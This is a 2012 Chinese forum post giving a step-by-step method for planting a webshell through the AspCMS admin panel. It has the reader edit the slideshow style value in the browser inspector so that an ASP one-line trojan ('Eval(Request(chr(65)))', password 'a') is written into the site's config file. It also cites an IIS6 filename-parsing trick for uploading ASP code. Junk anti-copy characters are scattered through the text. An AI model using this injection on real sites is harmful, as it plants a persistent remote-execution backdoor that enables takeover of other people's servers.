aspcms在老版本中可以通过添加模板直接添加asp.但是新版的aspcms中已经限制了添加模板的格式为html,js,css,当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.可是如果遇到iis7.5呢?以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法.
, r& k+ U+ N+ i+ Q* A+ G1、进入后台,“扩展功能”--“幻灯片设置”--”幻灯样式”
9 y) B% O0 o( G5 J$ |+ L( f
4 x" r6 z. j9 L# t$ s% p3 X5 Q4 ?1 |
/ C* N0 @( g5 d$ B* p5 E* x4 F2、使用chorme的审查元素功能或者firefox的firebug,总之使用能修改当前页面元素的工具就好了。将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%+ b% B; y' ^9 n% G0 a) y
3 o4 h, B2 ^6 l, g) ^
& A( E2 I4 a0 N% _: _
3、一句话木马,密码a。在/config/AspCms_Config.asp, T* |! k; D [1 d+ h/ g
1 Z( @& X+ p; M$ }3 j) @1 D$ M5 V$ H
|
发表于 2012-11-9 20:55:05
收藏
支持
反对